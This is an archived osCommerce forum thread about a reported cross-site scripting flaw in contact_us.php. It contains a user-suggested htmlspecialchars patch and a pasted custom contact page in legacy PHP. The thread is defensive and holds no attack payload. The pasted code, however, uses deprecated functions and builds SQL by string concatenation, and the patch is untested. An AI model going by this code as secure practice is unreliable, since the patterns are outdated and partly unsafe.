Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Cross Site Scripting in contact_us.php


Guest

Recommended Posts

I received this security alert this morning, but do not see a fix on the oscommerce.com web site, nor any mention in the forums here. Forgive me if I posted to the wrong place. Here are the details of the issue, as I received them:

 

Platform: Web Application

Title: osCommerce contact_us.php Cross-Site Scripting

Description: osCommerce is reported vulnerable to a cross-site

scripting issue. Attackers could leverage this towards theft of

cookie-based authentication credentials. osCommerce version 2.2-MS2 is

reported vulnerable.

Ref: http://www.securityfocus.com/archive/1/390540

 

By following the link, you may view an example of the vulerability being exposed on your own web site.

 

I fixed my installation by editing includes/functions/html_output.php

 

At line 222 change:

 

$field .= stripslashes($GLOBALS[$name]);

 

to

 

$field .= stripslashes(htmlspecialchars($GLOBALS[$name]));

 

save and test. This eliminates the problem on my system.

 

That field is populated on a POST method, the string was sent via the GET method, so there should be some kind of restriction that says the input can only come from the POST method, instead, the GET data is found and inserted.

 

I don't know what this will break in other areas of the program, but I don't really think any of the input boxes should display html anyways. Correct me if there is a better way please.

 

 

Silver.

Link to comment
Share on other sites

  • 3 weeks later...
I received this security alert this morning,  but do not see a fix on the oscommerce.com web site, nor any mention in the forums here. Forgive me if I posted to the wrong place. Here are the details of the issue, as I received them:

 

Platform: Web Application

Title: osCommerce contact_us.php Cross-Site Scripting

Description: osCommerce is reported vulnerable to a cross-site

scripting issue. Attackers could leverage this towards theft of

cookie-based authentication credentials. osCommerce version 2.2-MS2 is

reported vulnerable.

Ref: http://www.securityfocus.com/archive/1/390540

 

By following the link, you may view an example of the vulerability being exposed on your own web site.

 

I fixed my installation by editing includes/functions/html_output.php

 

At line 222 change:

 

      $field .= stripslashes($GLOBALS[$name]);

 

to

 

      $field .= stripslashes(htmlspecialchars($GLOBALS[$name]));

 

save and test. This eliminates the problem on my system.

 

That field is populated on a POST method, the string was sent via the GET method, so there should be some kind of restriction that says the input can only come from the POST method, instead, the GET data is found and inserted.

 

I don't know what this will break in other areas of the program, but I don't really think any of the input boxes should display html anyways. Correct me if there is a better way please.

Silver.

 

 

Does anyone know if this will cause any problems with the site? Does it fix the Cross-Site Scripting problem?

 

Thanks!

Most Valuable OsCommerce Contributions:

Also Purchased (AP) Preselection (cuts this resource hogging query down to nothing) -- Contribution 3294

FedEx Automated Labels -- Contribution 2244

RMA Returns system -- Contribution 1136

Sort Products By Dropdown -- Contribution 4312

Ultimate SEO URLs -- Contribution 2823

Credit Class & Gift Voucher -- Contribution 282

Cross-Sell -- Contribution 5347

Link to comment
Share on other sites

Yesudo made a fix - check the contributions.

 

I cannot seem to find anything in the contributions. What is the contribution called?

 

Thanks!

Most Valuable OsCommerce Contributions:

Also Purchased (AP) Preselection (cuts this resource hogging query down to nothing) -- Contribution 3294

FedEx Automated Labels -- Contribution 2244

RMA Returns system -- Contribution 1136

Sort Products By Dropdown -- Contribution 4312

Ultimate SEO URLs -- Contribution 2823

Credit Class & Gift Voucher -- Contribution 282

Cross-Sell -- Contribution 5347

Link to comment
Share on other sites

That fix causes my form not to work as I have the contact us choice contact form, can you suggest the fix for it or is none needed? Here is my contact_us.php

 

?php
/*
 $Id: contact_us.php,v 1.42 2003/06/12 12:17:07 hpdl Exp $

Revised as Contact Us Choice v1.0 by Fritz Clapp
+++ with these enhancements: ++++++++++++++++++++++++++++++++
- store address & phone from configuration is displayed
- an optional link may be used to show a map to the store
- additional text may be added under the store address & phone
- choice of multiple email destinations (if configured)
- name and email address of logged on customer is filled in
- subject of sent email distinguishes customer from guest
- preamble added to message with sender IP address
- requires entry of name (>3 chars) if guest
- checks that message body has some text
- uses new button_send.gif if it exists, instead of continue
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 for more info, refer to the contribution announcement and
 support threads at www.oscommerce.com/forums
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2004 osCommerce

 Released under the GNU General Public License
*/

 require('includes/application_top.php');

 require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_CONTACT_US);

 $error = false;
 if (isset($HTTP_GET_VARS['action']) && ($HTTP_GET_VARS['action'] == 'send')) {
   $name = tep_db_prepare_input($HTTP_POST_VARS['name']);
   $email_address = tep_db_prepare_input($HTTP_POST_VARS['email']);
   $enquiry = tep_db_prepare_input($HTTP_POST_VARS['enquiry']);
$sender_type = tep_db_prepare_input($HTTP_POST_VARS['sendertype']);

if (strlen($name)<3) {
 $error = true;
 $messageStack->add('contact', ENTRY_NAME_CHECK_ERROR);
   }
   if (!tep_validate_email($email_address)) {
     $error = true;
     $messageStack->add('contact', ENTRY_EMAIL_ADDRESS_CHECK_ERROR);
   }
if ($enquiry == '') {
 $error = true;
 $messageStack->add('contact', ENTRY_ENQUIRY_CHECK_ERROR);
   }
if ($error == false) {
  // add IP address and preamble text to message body
  $enquiry = sprintf(EMAIL_PREAMBLE_TEXT, $sender_type) . " " . tep_get_ip_address() . "\n-----------------------\n" . $enquiry;
  // use list of contact addresses if configured
     if (defined('CONTACT_US_LIST') && (CONTACT_US_LIST !='')){
 $send_to_array=explode("," ,CONTACT_US_LIST);
 preg_match('/\<[^>]+\>/', $send_to_array[$send_to], $send_email_array);
 $send_to_email= eregi_replace (">", "", $send_email_array[0]);
 $send_to_email= eregi_replace ("<", "", $send_to_email);
 // append sender type to subject line
 tep_mail(preg_replace('/\<[^*]*/', '', $send_to_array[$send_to]), $send_to_email, $sender_type . " " . EMAIL_SUBJECT, $enquiry, $name, $email_address);
  }else{
       tep_mail(STORE_OWNER, STORE_OWNER_EMAIL_ADDRESS, $sender_type . " " . EMAIL_SUBJECT, $enquiry, $name, $email_address);
  }
     tep_redirect(tep_href_link(FILENAME_CONTACT_US, 'action=success'));
   }
 }

 $breadcrumb->add(NAVBAR_TITLE, tep_href_link(FILENAME_CONTACT_US));
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET; ?>">
<title><?php echo TITLE; ?></title>
<base href="<?php echo (($request_type == 'SSL') ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_CATALOG; ?>">
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
<!-- header //-->
<?php require(DIR_WS_INCLUDES . 'header.php'); ?>
<!-- header_eof //-->

<!-- body //-->
<table class="mainTable" width="100%" cellspacing="0" cellpadding="0">
   <tr>
   <td class="mainTableLeft" width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="0">
<!-- left_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_left.php'); ?>
<!-- left_navigation_eof //-->
   </table></td>
<!-- body_text //-->
   <td width="634" valign="top" class="prodTableRight"><?php echo tep_draw_form('contact_us', tep_href_link(FILENAME_CONTACT_US, 'action=send')); ?><center><table border="0" width="615" cellspacing="0" cellpadding="0">
     <tr>
       <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
         <tr>
           <td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
           <td class="pageHeading" align="right"><?php echo tep_image(DIR_WS_IMAGES . 'table_background_contact_us.gif', HEADING_TITLE, HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td>
         </tr>
       </table></td>
     </tr>
     <tr>
       <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
     </tr>
<?php
 if ($messageStack->size('contact') > 0) {
?>
     <tr>
       <td><?php echo $messageStack->output('contact'); ?></td>
     </tr>
     <tr>
       <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
     </tr>
<?php
 }

 if (isset($HTTP_GET_VARS['action']) && ($HTTP_GET_VARS['action'] == 'success')) {
?>
     <tr>
       <td class="main" align="center"><?php echo tep_image(DIR_WS_IMAGES . 'table_background_man_on_board.gif', HEADING_TITLE,'0','0', 'align="left"') . TEXT_SUCCESS; ?></td>
     </tr>
     <tr>
       <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
     </tr>
     <tr>
       <td><table border="0" width="100%" cellspacing="1" cellpadding="2" class="infoBox">
         <tr class="infoBoxContents">
           <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
             <tr>
               <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
               <td align="right"><?php echo '<a href="' . tep_href_link(FILENAME_DEFAULT) . '">' . tep_image_button('button_continue.gif', IMAGE_BUTTON_CONTINUE) . '</a>'; ?></td>
               <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
             </tr>
           </table></td>
         </tr>
       </table></td>
     </tr>
<?php
 } else {
?>
          <tr>
              <td class="fieldValue" colspan="2"><?php echo HEADING_SUB_TITLE; ?><br><br></td>
         </tr>
     <tr>
      <td><table border="0" cellspacing="1" cellpadding="4" class="infoBox" width="100%"><tr class="infoBoxContents">
        <td class="main" valign="top" align="left" width="135">
       <b>Mailing Address:</b><br>
       <?php echo nl2br(STORE_NAME_ADDRESS);
       if (!CONTACT_MAP_LINK == '') {
       echo '<br><br><a href="' . tep_href_link(FILENAME_REDIRECT, 'action=url&goto=' . urlencode(eregi_replace('http://','',CONTACT_MAP_LINK)), 'NONSSL', false, false) . "\" target=_blank>" . tep_image_button('button_map.gif', IMAGE_BUTTON_MAP) . '</a>';
          }
       ?>
       <?php
       if (!CONTACT_US_ADDL_TEXT =='') {
        echo '<p align="' . ((CONTACT_US_ADDL_TEXT_ALIGN=='')?'center':CONTACT_US_ADDL_TEXT_ALIGN) . '">' . CONTACT_US_ADDL_TEXT . '</p>';
       }
       ?>
       </td>
   <td align="right">
   <table border="0" width="100%" cellspacing="1" cellpadding="2">
         <tr>
           <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
             <?php
   if ((defined('CONTACT_US_LIST')) && (CONTACT_US_LIST !='')){
      echo '<tr><td class="main">'. SEND_TO_TEXT . '</td></tr>'
    	 .'<tr><td class="main">';
    if(SEND_TO_TYPE=='radio'){
    foreach(explode("," ,CONTACT_US_LIST) as $k => $v) {
       if($k==0){
  	 $checked=true;
  	 }else{
  	 $checked=false;
  	 }
  	 echo tep_draw_radio_field('send_to', "$k", $checked) . " " . preg_replace('/\<[^*]*/', '', $v) ."<br>\n";
    }
     }else{
      foreach(explode("," ,CONTACT_US_LIST) as $k => $v) {
     $send_to_array[] = array('id' => $k, 'text' => preg_replace('/\<[^*]*/', '', $v));
     }
         echo tep_draw_pull_down_menu('send_to',  $send_to_array);
     }
	 echo "\n</td></tr>\n";
	 }
   ?>
    <tr>
               <td class="main"><?php echo ENTRY_NAME; ?></td>
             </tr>
             <tr>
               <td class="main"><?php
    // prefill first+last name and email address if customer is logged in
    if (tep_session_is_registered('customer_id')) {
    $customer_query_raw = "select customers_firstname, customers_lastname, customers_email_address from " . TABLE_CUSTOMERS . " where customers_id='" . $customer_id . "'";
    $customer_query = tep_db_query($customer_query_raw);
    $customer_array = tep_db_fetch_array($customer_query);
    echo tep_draw_input_field('name', $customer_array['customers_firstname'] . " " . $customer_array['customers_lastname'],'readonly');
    echo "</td></tr><tr><td class=\"main\">" . ENTRY_EMAIL . "</td></tr><tr><td class=\"main\">";
    echo tep_draw_input_field('email', $customer_array['customers_email_address'],'readonly');
      } else {
    echo tep_draw_input_field('name');
    echo "</td></tr><tr><td class=\"main\">" . ENTRY_EMAIL . "</td></tr><tr><td class=\"main\">";
   echo tep_draw_input_field('email');
      } ?></td>
             </tr>
             <tr>
               <td class="main"><?php echo ENTRY_ENQUIRY; ?></td>
             </tr>
             <tr>
               <td><?php echo tep_draw_textarea_field('enquiry', 'soft', 50, 15); ?></td>
             </tr>
           </table></td></tr></table></td>
         </tr>
       </table></td>
     </tr>
     <tr>
       <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
     </tr>
     <tr>
       <td><table border="0" width="100%" cellspacing="1" cellpadding="2" class="infoBox">
         <tr class="infoBoxContents">
           <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
             <tr>
               <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
               <td align="right"><?php
      // identify sender as customer or guest
   echo tep_draw_hidden_field('sendertype',  tep_session_is_registered('customer_id') ? TEXT_CUSTOMER : TEXT_GUEST);
   echo tep_image_submit(file_exists(DIR_WS_LANGUAGES . $language . '/images/buttons/button_send.gif')?'button_send.gif':'button_continue.gif', IMAGE_BUTTON_SEND); ?></td>
               <td width="10"><?php echo tep_draw_separator('pixel_trans.gif', '10', '1'); ?></td>
             </tr>
           </table></td>
         </tr>
       </table></td>
     </tr>
<?php
 }
?>
   </table></form></td>
<!-- body_text_eof //-->
    </table></td>
 </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->
<br>
</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

 

Thanks!!

Most Valuable OsCommerce Contributions:

Also Purchased (AP) Preselection (cuts this resource hogging query down to nothing) -- Contribution 3294

FedEx Automated Labels -- Contribution 2244

RMA Returns system -- Contribution 1136

Sort Products By Dropdown -- Contribution 4312

Ultimate SEO URLs -- Contribution 2823

Credit Class & Gift Voucher -- Contribution 282

Cross-Sell -- Contribution 5347

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...